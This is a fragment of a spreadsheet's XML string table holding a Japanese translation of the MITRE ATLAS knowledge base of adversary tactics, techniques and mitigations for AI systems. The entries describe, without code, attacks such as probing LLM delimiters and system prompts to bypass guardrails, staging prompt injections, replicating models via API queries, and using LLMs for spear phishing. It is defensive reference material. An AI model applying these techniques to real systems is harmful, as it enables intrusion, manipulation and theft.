    <t>敵対者は、標的を定める際に、公開されているアプリケーション リポジトリーを検索する場合があります。例としては、Google Play、iOS App Store、macOS App Store、Microsoft Store などがあります。
敵対者は、AI 対応のコンポーネントを含むアプリケーションを探す検索クエリーを作成する場合があります。多くの場合、次のステップは [公開されている AI アーティファクトの取得](/techniques/AML.T0002) です。</t>
  </si>
  <si>
    <t>AI の脆弱性に関する公開されている分析結果の検索</t>
  </si>
  <si>
    <t>[公開されている技術データベースの検索](/techniques/AML.T0000) と同様に、一般的な AI モデルの脆弱性については十分な研究が利用可能であることがよくあります。標的が特定されると、敵対者はこのクラスのモデルに対して行われた既存の研究を特定しようとする可能性があります。
これには、成功した攻撃の詳細を特定できる学術論文を読むだけでなく、それらの攻撃の既存の実装を特定することも含まれます。敵対者は、必要に応じて、[AI への敵対的攻撃の実装](/techniques/AML.T0016.000) を入手したり、独自の [AI への敵対的攻撃](/techniques/AML.T0017.000) を開発したりする可能性があります。</t>
  </si>
  <si>
    <t>公開されている技術データベースの検索</t>
  </si>
  <si>
    <t>敵対者は、公開されている研究や技術文書を検索して、被害者組織内における AI の使用方法と使用場所を知る可能性があります。敵対者はこの情報を使用して、攻撃の標的を特定したり、既存の攻撃をカスタマイズしてより効果的にしたりできます。組織は、多くの場合、実稼働環境で追加のプロプラエタリーなデータを学習したオープンソースのモデル アーキテクチャを使用します。この基礎となるアーキテクチャの知識により、敵対者はより現実的なプロキシー モデルを作成できます （[プロキシー AI モデルの作成](/techniques/AML.T0005)）。敵対者は、これらのリソースを検索して、被害者組織で雇用されている著者の出版物を探すことができます。
研究資料は、[定期刊行物およびカンファレンス議事録](/techniques/AML.T0000.000) に公開された学術論文として存在する場合もあれば、[プレプリント リポジトリ](/techniques/AML.T0000.001) や [技術ブログ](/techniques/AML.T0000.002) に保存されている場合もあります。</t>
  </si>
  <si>
    <t>被害者が所有するウェブサイトの検索</t>
  </si>
  <si>
    <t>敵対者は、標的を絞る際に使用できる情報を求めて、被害者が所有するウェブサイトを検索する場合があります。被害者が所有するウェブサイトには、AI 対応の製品やサービスに関する技術的な詳細が含まれている場合があります。被害者が所有するウェブサイトには、部署/部門の名前、物理的な場所、主要な従業員に関するデータ（名前、役割、連絡先情報など）など、さまざまな詳細が含まれている場合があります。これらのサイトには、事業運営や事業上の関係を強調する詳細も含まれている場合があります。
敵対者は、被害者が所有するウェブサイトを検索して、実用的な情報を収集する場合があります。
この情報は、敵対者が攻撃をカスタマイズするのに役立つ場合があります（例: [AI への敵対的攻撃](/techniques/AML.T0017.000) または [手動による変更](/techniques/AML.T0043.003)）。
これらのソースからの情報により、他の形態の偵察ができる可能性が明らかになる場合があります（例: [公開されている技術データベースの検索](/techniques/AML.T0000) または [AI の脆弱性に関する公開されている分析結果の検索](/techniques/AML.T0001)）。</t>
  </si>
  <si>
    <t>サーバーレス</t>
  </si>
  <si>
    <t>敵対者は、Cloudflare Workers、AWS Lambda 関数、Google Apps Scripts といったサーバーレス クラウド インフラストラクチャを購入・構成し、標的の絞り込みに利用することがあります。サーバーレス インフラストラクチャを利用することで、敵対者は、攻撃活動中に使用したインフラストラクチャを特定しにくくすることができます。
サーバーレスのランタイム環境を入手すれば、感染したマシンに直接応答したり、敵対者が所有するコマンド＆コントロール サーバーへのトラフィックをプロキシしたりすることができます。これらの機能によって生成されるトラフィックは、一般的なクラウド プロバイダーのサブドメインから送信されているように見えるため、これらのプロバイダーへの通常のトラフィックと区別することが困難になる可能性があります。これは、任意の場所からのコンテンツの取得を阻止するコンテンツ セキュリティ ポリシーを回避するために利用される可能性があります。</t>
  </si>
  <si>
    <t>社会的損害</t>
  </si>
  <si>
    <t>社会的損害は、子供が下品なコンテンツにさらされるなど、一般大衆または特定の脆弱なグループに影響を及ぼすような有害な結果を生み出す可能性があります。</t>
  </si>
  <si>
    <t>ソフトウェア ツール</t>
  </si>
  <si>
    <t>敵対者は、自らの作戦を支援するソフトウェア ツールを探して入手する場合があります。正当な使用のために設計されたソフトウェアが、敵対者によって悪意を持って再利用される可能性があります。敵対者は、目的を達成するためにソフトウェア ツールを変更またはカスタマイズする場合があります。AI システムへの攻撃を支援するために使用されるソフトウェア ツールは、必ずしも AI ベースであるとは限りません。</t>
  </si>
  <si>
    <t>AI システムに対するチャフ データを使用したスパム攻撃</t>
  </si>
  <si>
    <t>敵対者は、検出数の増加を引き起こすチャフ データで AI システムをスパム攻撃する可能性があります。これにより、被害者組織のアナリストは、誤った推論をレビューして修正するために時間を浪費する可能性があります。</t>
  </si>
  <si>
    <t>LLM ソーシャル エンジニアリングによるスピア フィッシング</t>
  </si>
  <si>
    <t>敵対者は LLM を標的型ソーシャル エンジニアに変えることがあります。LLM は、テキスト会話を通じてユーザーとやり取りできます。LLM は、敵対者から指示を受けてユーザーから機密情報を入手し、効果的なソーシャル エンジニアとして行動することができます。LLM は、敵対者が定義した特定のペルソナを標的にすることができます。これにより、敵対者はスピア フィッシング攻撃を拡大し、個人を標的にして特権システムの資格情報などの秘匿情報を漏洩させることができます。</t>
  </si>
  <si>
    <t>特殊文字セット</t>
  </si>
  <si>
    <t>敵対者は、大規模言語モデルで使用される区切り文字や特殊文字セットを探索する可能性があります。例えば、検索拡張生成アプリケーションでコンテキストとユーザー プロンプトを区別するために使用される区切り文字などです。これらの文字は、後に大規模言語モデルを混乱させたり、不正な動作をさせたりするために悪用される可能性があります。</t>
  </si>
  <si>
    <t>機能のステージング</t>
  </si>
  <si>
    <t>敵対者は、標的の絞り込みに使用できる機能をアップロード、インストール、またはその他の方法でセットアップする場合があります。敵対者は、自身の作戦を支援するために、開発（[機能の開発](/techniques/AML.T0017)）または取得（[機能の獲得](/techniques/AML.T0016)）した機能を持ち込み、自らの管理下にあるインフラストラクチャ上にステージングする必要がある場合があります。これらの機能は、敵対者が以前に購入またはレンタルしたインフラストラクチャ（[インフラストラクチャの獲得](/techniques/AML.T0008)）、または何らかの方法で侵害されたインフラストラクチャ上にステージングされる可能性があります。また、GitHub などの Web サービス、Hugging Face などのモデル レジストリ、コンテナ レジストリ上にステージングされる可能性もあります。
敵対者は、汚染済みデータセット（[汚染済みデータセットの公開](/techniques/AML.T0019)）、悪意のあるモデル（[汚染済みモデルの公開](/techniques/AML.T0058))、プロンプト インジェクションなどの様々なアーティファクトをステージングする可能性があります。正規の企業名や製品名を標的にしたり、タイポ スクワッティングを行ったり、幻覚を利用したり（LLM の幻覚の探索](/techniques/AML.T0062)) する場合もあります。</t>
  </si>
  <si>
    <t>システム命令に関するキーワード</t>
  </si>
  <si>
    <t>敵対者は、関数名やオブジェクト名など、大規模言語モデル（LLM）にとって特別な意味を持つキーワードを探索する可能性があります。これらのキーワードは、LLM を混乱させたり操作したりして不正な動作をさせたり、LLM がアクセスできるプラグインを呼び出したりするために悪用される可能性があります。</t>
  </si>
  <si>
    <t>システム プロンプト</t>
  </si>
  <si>
    <t>敵対者は、AI システムの構築者によって提供される大規模な言語モデルのシステム命令を探索し、システムの機能について学習してガードレールを回避する可能性があります。</t>
  </si>
  <si>
    <t>技術ブログ</t>
  </si>
  <si>
    <t>学術機関の研究室や企業の研究開発部門には、機械学習の使用法や組織固有の問題への応用を紹介するブログがよくあります。個々の研究者も、ブログ投稿で自身の研究成果を文書化することがよくあります。敵対者は、標的の被害者組織またはその従業員が作成した投稿を検索する場合があります。[定期刊行物およびカンファレンス議事録](/techniques/AML.T0000.000)や[プレプリント リポジトリ](/techniques/AML.T0000.001) と比較すると、この資料には AI システムのより実用的な側面が含まれていることがよくあります。これには、使用されている基礎技術やフレームワーク、API アクセスやユースケースに関する情報が含まれる場合があります。これにより、敵対者は、その組織内部での AI の使用方法や、攻撃のカスタマイズに役立つ可能性のあるアプローチの詳細をよりよく理解できるようになります。</t>
  </si>
  <si>
    <t>収集した AI アーティファクトによるプロキシーの学習</t>
  </si>
  <si>
    <t>プロキシー モデルは、敵対者が収集した標的のモデルを代表する AI アーティファクト（データ、モデル アーキテクチャ、事前学習済みモデルなど）から学習を行う場合があります。これは、敵対者が利用できるよりも高いレベルのアクセスを必要とする攻撃を開発する目的で、または標的のモデルと対話せずに既存の攻撃を検証する手段として使用できます。</t>
  </si>
  <si>
    <t>レプリケーションによるプロキシーの学習</t>
  </si>
  <si>
    <t>敵対者は、プライベート モデルをレプリケーションする可能性があります。敵対者は、被害者の [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を繰り返しクエリーすることで、標的のモデルの推論をデータセットに収集できます。推論は、標的のモデルの動作とパフォーマンスを模倣する別のモデルをオフラインで学習するためのラベルとして使用されます。
標的のモデルを厳密に模倣する複製したモデルは、攻撃をステージングするための貴重なリソースです。敵対者は、複製したモデルを使用して、さまざまな目的（例: [AI モデルの回避](/techniques/AML.T0015)、[AI システムに対するチャフ データを使用したスパム攻撃](/techniques/AML.T0046)）で [敵対的データの作成](/techniques/AML.T0043) を行うことができます。</t>
  </si>
  <si>
    <t>安全でない AI アーティファクト</t>
  </si>
  <si>
    <t>敵対者は、実行されると有害な影響を及ぼす安全でない AI アーティファクトを開発する可能性があります。敵対者は、この手法を使用して、システムへの永続的なアクセスを確立できます。これらのモデルは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入される可能性があります。
モデルのシリアル化は、モデルの保存、転送、および読み込みによく使用される手法です。ただし、適切なチェックを行わないこの形式は、コード実行の機会をもたらします。</t>
  </si>
  <si>
    <t>セキュリティ上問題のある資格情報</t>
  </si>
  <si>
    <t>敵対者は、侵害済みのシステムを検索して、セキュリティ上問題のある状態で保存された資格情報を見つけて取得する可能性があります。
これらの資格情報は、平文テキスト ファイル（bash 履歴など）、環境変数、オペレーティング システム、またはアプリケーション固有のリポジトリ（レジストリ内の資格情報など）、またはその他の特殊なファイル/アーティファクト（秘密鍵など）など、システム上のさまざまな場所に保存されたり、誤配置されたりする可能性があります。</t>
  </si>
  <si>
    <t>学習済みモデルの使用</t>
  </si>
  <si>
    <t>敵対者は、攻撃のステージングを支援するために、既製の事前学習済みモデルを被害者モデルのプロキシーとして使用する可能性があります。</t>
  </si>
  <si>
    <t>ユーザーによる実行</t>
  </si>
  <si>
    <t>敵対者は、実行権限を得るために、ユーザーの特定のアクションに頼る場合があります。ユーザーは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入された安全でないコードを誤って実行する可能性があります。ユーザーは、例えば悪意のある文書ファイルまたはリンクを開くことによって悪意のあるコードを実行させられるソーシャル エンジニアリングの対象となる可能性があります。</t>
  </si>
  <si>
    <t>ユーザー被害</t>
  </si>
  <si>
    <t>ユーザー被害には、組織レベルではなく、被害者個人に向けられたり被害者個人が感じたりする金銭的被害や風評被害など、さまざまな種類の被害が含まれる可能性があります。</t>
  </si>
  <si>
    <t>有効なアカウント</t>
  </si>
  <si>
    <t>敵対者は、初期アクセスを獲得する手段として、既存のアカウントの資格情報を入手して悪用する可能性があります。資格情報は、個々のユーザー アカウントのユーザー名とパスワード、またはさまざまな AI リソースとサービスへのアクセスを提供する API キーの形式をとる場合があります。
侵害された資格情報により、追加の AI アーティファクトへのアクセスが提供され、敵対者が [AI アーティファクトの探索](/techniques/AML.T0007) を実行できるようになります。侵害された資格情報により、開発中または実稼働環境で使用される AI アーティファクトへの書き込みアクセスなど、敵対者に権限が付与される可能性もあります。</t>
  </si>
  <si>
    <t>攻撃の検証</t>
  </si>
  <si>
    <t>敵対者は、推論 API または標的のモデルのオフライン コピーへのアクセスを介して攻撃の有効性を検証できます。これにより、敵対者は、アプローチが機能するという確信を得ることができ、後で任意のタイミングで攻撃を実行できます。敵対者は、一度だけ攻撃を検証しますが、標的のモデルのコピーを実行している多くのエッジ デバイスに対してそれを使用する可能性があります。敵対者は、攻撃をデジタルで検証し、後で [物理環境へのアクセス](/techniques/AML.T0041) にそれを展開する可能性があります。敵対者は、最小限の数のクエリーまたはモデルのオフライン コピーを使用できるため、攻撃の検証を検出するのは困難です。</t>
  </si>
  <si>
    <t>ホワイト ボックス最適化</t>
  </si>
  <si>
    <t>ホワイト ボックス最適化では、敵対者は標的のモデルに完全なアクセスが可能であり、敵対的なサンプルを直接最適化します。この方法で学習した敵対的なサンプルは、標的のモデルに対して最も効果的です。</t>
  </si>
  <si>
    <t>AI 攻撃のステージング</t>
  </si>
  <si>
    <t>敵対者は、標的のシステムに関する知識とアクセスを活用して、攻撃をカスタマイズします。
AI 攻撃のステージングは​​、攻撃者が標的の AI モデルへの攻撃を準備するために使用する手法で構成されます。手法には、プロキシー モデルの学習、標的のモデルの汚染、標的のモデルに入力する敵対的データの作成などがあります。これらの手法の一部はオフラインで実行できるため、軽減が困難です。これらの手法は、敵対者の最終目標を達成するためによく使用されます。</t>
  </si>
  <si>
    <t>AI モデルへのアクセス</t>
  </si>
  <si>
    <t>敵対者は、AI モデルへの何らかのレベルのアクセスを取得しようとします。
AI モデルへのアクセスにより、AI モデルへのさまざまな種類のアクセスを使用する手法が利用可能になります。このアクセスは、敵対者が情報を取得したり、攻撃を開発したり、モデルにデータを入力する手段として使用できます。アクセス レベルは、モデルの内部を完全に把握することから、AI モデルで使用するためにデータが収集される物理環境へのアクセスまでに渡り、さまざまです。敵対者は、攻撃のステージングから標的のシステムへ影響を及ぼすことに至るまでといった攻撃の過程でさまざまなレベルのモデル アクセスを使用する可能性があります。
AI モデルへのアクセスには、モデルが格納されているシステムへのアクセスが必要な場合があります。モデルは、API 経由で公にアクセス可能である場合もあれば、プロセスの一部として AI を利用する製品またはサービスとのやり取りを通じて間接的にアクセスされる場合もあります。</t>
  </si>
  <si>
    <t>収集</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトや、その目的に関連するその他の関連情報を収集しようと試みます。
収集は、敵対者が情報を収集するために使用する可能性のある手法と、攻撃者の目的の達成に関連する情報を収集するソースで構成されます。多くの場合、データ収集後の次の目標は、AI アーティファクトを窃取する（持出す）か、収集した情報を使用して今後の作戦を準備することです。対象となる一般的なソースには、ソフトウェア リポジトリ、コンテナー レジストリ、モデル リポジトリ、オブジェクト ストアなどがあります。</t>
  </si>
  <si>
    <t>コマンド＆コントロール</t>
  </si>
  <si>
    <t>敵対者は、侵害された AI システムと通信して制御下に置こうとします。
コマンド＆コントロール（C&amp;C）とは、敵対者が標的ネットワーク内で制御下にあるシステムと通信するために使用する可能性のある手法です。敵対者は、通常、検出を回避するために、通常の想定内トラフィックを模倣しようとします。これには多くの方法が存在し、敵対者が標的のネットワーク構造と防御策に応じて様々なレベルのステルス性で C&amp;C を確立できます。</t>
  </si>
  <si>
    <t>資格情報へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、アカウント名とパスワードを窃取しようと試みます。
資格情報へのアクセスは、アカウント名やパスワードなどの資格情報を盗むための手法です。資格情報を取得するために使用される手法には、キー ロギングや資格情報のダンプなどがあります。正規の資格情報を使用すると、敵対者はシステムにアクセスでき、検出されにくくなり、目的を達成するためにさらに多くのアカウントを作成する機会を得られます。</t>
  </si>
  <si>
    <t>防御策の回避</t>
  </si>
  <si>
    <t>敵対者は、AI 対応のセキュリティ ソフトウェアによる検出を回避しようとします。
防御策の回避は、敵対者が侵害中に検出されることを回避するために使用する手法です。防御策の回避に使用される手法には、マルウェア検出器などの AI 対応のセキュリティ ソフトウェアの回避が含まれます。</t>
  </si>
  <si>
    <t>探索</t>
  </si>
  <si>
    <t>敵対者は、被害者組織の AI 環境を解明しようとします。
探索は、敵対者がシステムと内部ネットワークに関する知識を得るために使用する可能性のある手法です。これらの手法は、敵対者が環境を観察し、行動方法を決定する前に方向を決めるのに役立ちます。また、敵対者は、制御できるものやエントリ ポイントの周囲にあるものを調べて、それが現在の目的にどのように役立つかを発見することもできます。オペレーティング システムのネイティブ ツールは、この侵害後の情報収集の目的のためによく使用されます。</t>
  </si>
  <si>
    <t>実行</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトまたはソフトウェアに埋め込まれた悪意のあるコードを実行しようとします。
実行は、敵対者が制御しローカル システムまたはリモート システムでコードを実行する手法で構成されます。悪意のあるコードを実行する手法は、ネットワークの探索やデータの盗難など、より広範な目標を達成するために、他のすべての戦術の手法と組み合わせられることがよくあります。例えば、敵対者はリモート アクセス ツールを使用して、リモート システムの探索を行う PowerShell スクリプトを実行する場合があります。</t>
  </si>
  <si>
    <t>持出し</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトや機械学習システムに関するその他の情報を盗もうとします。
持出しは、敵対者がネットワークからデータを窃取するために使用する可能性のある手法です。データは、その貴重な知的財産のために窃取される場合もあれば、今後の作戦の準備のために搾取される場合もあります。
標的のネットワークからデータを持出す手法には、通常、コマンド &amp;コントロール チャネルまたは代替チャネルを介してデータを転送することや、送信にサイズ制限を設けることなどがあります。</t>
  </si>
  <si>
    <t>影響</t>
  </si>
  <si>
    <t>敵対者は、AI システムとデータを操作し、妨害し、信頼を損なわせ、破壊しようとします。
影響とは、ビジネス プロセスと運用プロセスを操作して可用性を妨害したり整合性を損なったりするために敵対者が使用する手法です。影響に使用される手法には、データの破壊や改ざんが含まれます。場合によっては、ビジネス プロセスは問題ないように見えても、敵対者の目的にかなうように変更されている可能性があります。敵対者は、これらの手法を使用して、最終目的を達成したり、機密性侵害を隠蔽したりすることがあります。</t>
  </si>
  <si>
    <t>初期アクセス</t>
  </si>
  <si>
    <t>敵対者は、AI システムにアクセスしようとします。
標的のシステムは、ネットワーク、モバイル デバイス、またはセンサー プラットフォームなどのエッジ デバイスである可能性があります。システムで使用される AI 機能は、オンボードまたはクラウド対応の AI 機能を備えたローカルである可能性があります。
初期アクセスは、さまざまなエントリ ベクトルを使用してシステム内で最初の足掛かりを得る手法で構成されます。</t>
  </si>
  <si>
    <t>永続化</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトやソフトウェアを介して足掛かりを維持しようとします。
永続化は、再起動、資格情報の変更、アクセスを遮断する可能性のあるその他の中断があっても、敵対者がシステムへのアクセスを維持するために使用する手法です。永続化に使用される手法には、多くの場合、汚染された学習データやバックドアが仕掛けられた AI モデルなどといった改変された AI アーティファクトを残すことが含まれます。</t>
  </si>
  <si>
    <t>権限昇格</t>
  </si>
  <si>
    <t>敵対者は、より高いレベルの権限を取得しようとします。
権限昇格は、敵対者がシステムまたはネットワークでより高いレベルの権限を取得するために使用する手法です。敵対者は、多くの場合、権限のないアクセスでネットワークに侵入して探索できますが、目的を達成するには、権限を昇格する必要があります。一般的なアプローチは、システムの弱点、誤った構成、脆弱性を利用することです。権限を昇格したアクセスの例には、次のものがあります。
- システム/ルート レベル
- ローカル管理者
- 管理者のようなアクセス権を持つユーザー アカウント
- 特定のシステムにアクセスしたり、特定の機能を実行したりできるユーザー アカウント
これらの手法は、敵対者を永続化する OS 機能が権限昇格したコンテキストで実行できるため、永続化の手法と重複することがよくあります。</t>
  </si>
  <si>
    <t>偵察</t>
  </si>
  <si>
    <t>敵対者は、AI システムに関して今後の作戦計画に使用できる情報を収集しようとします。
偵察は、敵対者が標的を設定することを支援するために使用できる情報を積極的または受動的に収集する手法です。このような情報には、被害者組織の AI 機能や研究活動の詳細が含まれる場合があります。この情報は、敵対者が収集した情報を使用して関連する AI アーティファクトを取得したり、被害者が使用する AI 機能を標的にしたり、被害者が使用する特定のモデルに合わせて攻撃を調整したり、さらなる偵察活動を推進および主導したりするなど、攻撃者のライフサイクルの他のフェーズを支援するために活用できます。</t>
  </si>
  <si>
    <t>リソースの開発</t>
  </si>
  <si>
    <t>敵対者は、作戦を支援するために使用できるリソースを構築しようとします。
リソースの開発は、敵対者が標的を設定することを支援するために使用できるリソースを作成、購入、または侵害/盗難する手法で構成されます。このようなリソースには、AI アーティファクト、インフラストラクチャ、アカウント、または機能が含まれます。これらのリソースは、敵対者が [AI 攻撃のステージング](/tactics/AML.TA0001) などの攻撃ライフサイクルの他のフェーズを支援するために活用できます。</t>
  </si>
  <si>
    <t>関連引用</t>
  </si>
  <si>
    <t>AI 部品表</t>
  </si>
  <si>
    <t>AI 部品表（AI BOM）には、AI の構築に使用されたアーティファクトとリソースの完全なリストが含まれています。AI 部品表は、サプライ チェーンのリスクを軽減し、報告された脆弱性への迅速な対応を可能にします。
これには、データセットの出所、つまり AI アプリケーションに使用されたデータセットの詳細な履歴の維持が含まれます。履歴には、データセットのソースに関する情報だけでなく、変更内容の完全な記録も含まれる場合があります。</t>
  </si>
  <si>
    <t>AI モデルの配布方法</t>
  </si>
  <si>
    <t>AI モデルをエッジ デバイスにデプロイすると、システムの攻撃対象領域が増大する可能性があります。敵対者がモデルにアクセスするレベルを下げるために、クラウド内でモデルを提供することを検討する必要があります。また、敵対者がモデルの前処理方法にアクセスできるグレー ボックス攻撃を防ぐために、クラウド内でのコンピューティング機能も検討する必要があります。</t>
  </si>
  <si>
    <t>AI テレメトリのログ記録</t>
  </si>
  <si>
    <t>デプロイされた AI モデルの入出力のログ記録を実装します。ログを監視することで、セキュリティ上の脅威を検出し、影響を軽減することができます。
さらに、ログ記録を有効にすると、検出を回避したい敵対者が AI リソースを利用するのを阻止できます。</t>
  </si>
  <si>
    <t>敵対的入力の検出</t>
  </si>
  <si>
    <t>既知の無害な動作から逸脱したり、以前の攻撃で観察された動作パターンを示したり、潜在的に悪意のある IP アドレスから送信されたりする敵対的な入力や異常なクエリーを検出してブロックします。AI モデルより前に、敵対的検出アルゴリズムを AI システムに組み込みます。</t>
  </si>
  <si>
    <t>コード署名</t>
  </si>
  <si>
    <t>デジタル署名の検証によってバイナリとアプリケーションの整合性を強化し、信頼できないコードの実行を防ぎます。敵対者は AI ソフトウェアまたはモデルに悪意のあるコードを埋め込む可能性があります。コード署名の強化により、AI サプライ チェーンの侵害を防ぎ、悪意のあるコードの実行を防ぐことができます。</t>
  </si>
  <si>
    <t>保存されている AI モデルとデータへのアクセスの制御</t>
  </si>
  <si>
    <t>内部のモデル レジストリへのアクセス制御を確立し、実稼働モデルへの内部アクセスを制限します。学習データへのアクセスは、承認されたユーザーのみに制限します。</t>
  </si>
  <si>
    <t>実稼働環境の AI モデルとデータへのアクセスの制御</t>
  </si>
  <si>
    <t>実稼働モデルにアクセスする前に、ユーザーに ID の検証を要求します。API エンドポイントの認証を要求し、実稼働モデルのクエリを監視して、使用ポリシーに準拠していることを確実にし、モデルの悪用を防止します。</t>
  </si>
  <si>
    <t>機密情報の暗号化</t>
  </si>
  <si>
    <t>AI モデルなどの機密データを暗号化して、機密データにアクセスを試みる敵対者から保護します。</t>
  </si>
  <si>
    <t>生成 AI ガードレール</t>
  </si>
  <si>
    <t>ガードレールとは、生成 AI モデルとユーザーと共有される出力の間に設置される安全対策であり、望ましくない入出力を防ぎます。ガードレールは、フィルター、ルールベース ロジック、正規表現などの検証ツールや、分類器や LLM の活用、固有表現抽出（NER）などの AI ベースのアプローチを用いて、プロンプトや応答の安全性を評価することができます。ドメイン固有の手法を用いることで、エチケット、ブランド毀損、脱獄、偽情報、コード エクスプロイト、SQL インジェクション、データ漏洩など、様々な分野におけるリスクを軽減できます。</t>
  </si>
  <si>
    <t>生成 AI ガイドライン</t>
  </si>
  <si>
    <t>ガイドラインとは、ユーザー入力と生成 AIモ デルの間に配置され、モデルが望ましい出力を生成し、望ましくない出力を防止するための安全対策です。
ガイドラインは、すべてのユーザー プロンプトに指示を追加する形で実装することも、システム プロンプト内の指示の一部として実装することもできます。ガイドラインは、システムの目標、役割、意思を定義し、安全性とセキュリティに関するパラメータの概要を示すことができます。</t>
  </si>
  <si>
    <t>生成 AI モデルの整合性（アライメント）</t>
  </si>
  <si>
    <t>生成 AI モデルを学習または微調整する際には、安全性、セキュリティ、コンテンツ ポリシーとのモデルの整合性（アライメント）を改善する手法を活用することが重要です。
微調整プロセスにより、生成 AI モデルに組み込まれた安全機構が削除される可能性がありますが、教師ありの微調整、人間からのフィードバックまたは AI フィードバックからの強化学習、対象を絞った安全性コンテキスト蒸留などの手法を利用することで、モデルの安全性と整合性（アライメント）を向上させることができます。</t>
  </si>
  <si>
    <t>入力の復元</t>
  </si>
  <si>
    <t>すべての推論データを前処理して、潜在的な敵対的摂動を無効化または逆転させます。</t>
  </si>
  <si>
    <t>モデル アーティファクトの公開の制限</t>
  </si>
  <si>
    <t>実稼働環境で使用されている、または実稼働環境で使用されているものを代表するデータ、アルゴリズム、モデル アーキテクチャ、モデル チェックポイントなどの技術的なプロジェクトの詳細の公開を制限します。</t>
  </si>
  <si>
    <t>公開情報の開示の制限</t>
  </si>
  <si>
    <t>組織の製品やサービスで使用されている AI スタックに関する技術情報の公開を制限します。AI の使用方法に関する技術的知識は、敵対者が標的を定めて攻撃を標的のシステムにカスタマイズするために利用される可能性があります。さらに、AI の手法、モデル アーキテクチャ、データセットなどの技術的な詳細を推測できる組織の情報（物理的な場所、研究者の名前、部門構造など）の公開を制限することを検討する必要があります。</t>
  </si>
  <si>
    <t>AI データセットの出所の維持</t>
  </si>
  <si>
    <t>AI アプリケーションに使用されるデータセットの詳細な履歴を維持します。履歴には、データセットのソースに関する情報と、変更内容の完全な記録を含める必要があります。</t>
  </si>
  <si>
    <t>モデルの堅牢化</t>
  </si>
  <si>
    <t>敵対的学習やネットワーク蒸留などの敵対的入力に対して AI モデルを堅牢にするための手法を使用します。</t>
  </si>
  <si>
    <t>AI 出力のパッシブ オブファスケーション</t>
  </si>
  <si>
    <t>エンド ユーザーに提供されるモデル出力の忠実度を下げると、敵対者がモデルに関する情報を抽出し、モデルに対する攻撃を最適化する能力が低下する可能性があります。</t>
  </si>
  <si>
    <t>ライブラリ読み込みの制限</t>
  </si>
  <si>
    <t>AI モデルへのクエリ数の制限</t>
  </si>
  <si>
    <t xml:space="preserve">ユーザーが実行できるクエリの合計数とレートを制限します。
</t>
  </si>
  <si>
    <t>学習データの無害化</t>
  </si>
  <si>
    <t>アンサンブル法の使用</t>
  </si>
  <si>
    <t>敵対的入力に対する堅牢性を高めるために、推論にモデルのアンサンブルを使用します。一部の攻撃は、1 つのモデルまたはモデル ファミリーを効果的に回避できますが、他のモデルに対しては効果がない場合があります。</t>
  </si>
  <si>
    <t>マルチモーダル センサーの使用</t>
  </si>
  <si>
    <t>複数のセンサーを組み込んでさまざまな視点とモダリティを統合し、物理的な攻撃を受けやすい単一障害点を回避します。</t>
  </si>
  <si>
    <t>ユーザーの研修</t>
  </si>
  <si>
    <t>安全なコーディング手法と AI の脆弱性について、AI モデル開発者に教育を行います。</t>
  </si>
  <si>
    <t>AI モデルの検証</t>
  </si>
  <si>
    <t>AI アーティファクトの検証</t>
  </si>
  <si>
    <t>すべての機械学習アーティファクトの暗号チェックサムを検証して、ファイルが敵対者によって変更されていないことを確認します。</t>
  </si>
  <si>
    <t>脆弱性スキャン</t>
  </si>
  <si>
    <t>脆弱性スキャンは、潜在的に悪用される可能性のあるソフトウェアの脆弱性を発見し、修正するために使用されます。
AI モデルの保存に一般的に使用される pickle ファイルなどのファイル形式には、任意のコード実行を可能にするエクスプロイトが含まれている可能性があります。これらのファイルは、コードの実行、新しいプロセスの作成、ネットワーク機能の確立に使用される可能性のある潜在的に安全でない呼び出しがないかスキャンする必要があります。敵対者は、モデルが破損したファイルに悪意のあるコードを埋め込む可能性があるため、スキャナーは完全にデシリアライズできないモデルでも動作できる必要があります。モデル アーティファクトと、モデルによって生成されるダウン ストリーム製品の両方に対して、既知の脆弱性がないかスキャンする必要があります。</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0015</t>
  </si>
  <si>
    <t>AML.TA0015</t>
  </si>
  <si>
    <t>x-mitre-tactic--abaefe4f-7544-5972-840d-543910eaf5ca</t>
  </si>
  <si>
    <t>水平展開</t>
    <rPh sb="0" eb="2">
      <t>スイヘイ</t>
    </rPh>
    <rPh sb="2" eb="4">
      <t>テンカイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>汚染された学習データを検出し、削除または修復します。学習データは、モデルの学習の前、およびアクティブ ラーニング モデルの場合は定期的に無害化する必要があります。
取り込まれた学習データを制限するフィルターを実装します。特定の露骨な言葉や攻撃的な言葉などの不要なコンテンツの使用を排除するコンテンツ ポリシーを確立します。</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>course-of-action--70836747-6dd7-52ee-82a8-547def5d2c6c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0028</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントのツールの権限設定</t>
    <rPh sb="14" eb="16">
      <t>ケンゲン</t>
    </rPh>
    <rPh sb="16" eb="18">
      <t>セッテイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AML.M0031</t>
  </si>
  <si>
    <t>course-of-action--689cbf83-609f-55ce-95d6-9d05df6da1f4</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0031</t>
  </si>
  <si>
    <t>記憶の堅牢化</t>
    <rPh sb="0" eb="2">
      <t>キオク</t>
    </rPh>
    <rPh sb="3" eb="6">
      <t>ケンロウカ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>記憶の堅牢化とは、AI エージェントが記憶とコンテキストを保存およびアクセスする方法に関して、信頼境界と安全なプロセスを構築することです。これは、記憶の更新に外部認証と検証を要求することでエージェントの記憶保存能力を制限したり、エージェントがアクションを実行する前に取得した記憶の意味的整合性チェックを実行したり、記憶の監視と汚染された記憶の修復プロセスのための制御を実装したりするなど、複数の戦略を組み合わせて実装できます。</t>
    <rPh sb="0" eb="2">
      <t>キオク</t>
    </rPh>
    <rPh sb="3" eb="6">
      <t>ケンロウカ</t>
    </rPh>
    <rPh sb="19" eb="21">
      <t>キオク</t>
    </rPh>
    <rPh sb="73" eb="75">
      <t>キオク</t>
    </rPh>
